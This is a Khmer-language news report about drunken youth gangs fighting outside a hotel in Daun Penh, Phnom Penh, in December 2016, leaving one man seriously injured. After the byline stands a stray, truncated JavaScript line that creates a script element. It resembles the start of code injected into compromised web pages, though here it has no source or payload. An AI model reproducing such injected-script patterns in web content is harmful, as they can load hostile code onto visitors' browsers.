Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

អសន្តិសុខខណ្ឌដូនពេញបើកឆាកប្រយុទ្ធគ្នាដូចថតកុនម្ខាងរបួសធ្ងន់ម្ខាងរត់រួច

ភ្នំពេញ៖ក្រុមស្ទាវពីក្រុមផឹកស៊ីស្រវឹងបើកឆាកប្រយុទ្ធគ្នាបណ្ដាលអោយស្ទាវម្នាក់ត្រូវដួលដេកសន្លប់ស្តូកស្ដឹងនៅនឹងកន្លែង។ ហេតុការណ៍នេះកើតឡើងកាលពីវេលាម៉ោង១និង១០នាទីរំលងអធ្រាតឈានចូលថ្ងៃទី៩ខែធ្នូឆ្នាំ២០១៦ ស្ថិតនៅចំណុចមុខសណ្ឋាគាអូលីដេ ក្នុងសង្កាត់ច្រះចក ខណ្ឌដូនពេញ។

តាមប្រភពពីប្រជាពរដ្ឋនៅកន្លែងកើតហេតុបានអោយដឹងថា មុនពេលកើតហេតុគេឃើញក្រុមក្មេងស្ទាវពីរក្រុមផឹកស៊ី លុះដល់ស្រវឹងរៀងៗខ្លួន ស្ទាវ១ក្រុមទៀតមានគ្នា២នាក់បានដើរតាមផ្លូវ៨៤គោលបំណងត្រលប់មកផ្ទះ ខណៈមកដល់ចំណុចកើតខាងលើមិនដឹងជាមានរឿងអី មានស្ទាវ១ក្រុមទៀតមានគ្នា៤ទៅ៥នាក់ដំបងគ្រប់ដៃបានមកវាយស្ទាវពីរនាក់ប្រសេចប្រសាចពេញផ្លូវបណ្ដាលអោយម្នាក់ត្រូវរងរបួស្ងធ្ងន់ ចំនែកម្នាក់ទៀតបានរត់រួច ក្រោយពីវាយអោយរងរបួសហើយស្ទាវទាំងនោះបានគេចខ្លួនបាត់ស្រមោល។

ក្រោយកើតហេតុសមត្ថកិច្ចមូលដ្ឋានបានត្រឹមតែចុះមកកន្លែងកើតហេតុ ទាក់ទងហៅរថយន្តមន្ទីរពេទ្យកាល់ ម៉ែត្រ ដឹកអ្នករបួសយកទៅសង្គ្រោះបាត់ទៅ។ដោយ៖ព្រះអង្គខ្មៅមានរិទ្ធិ

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More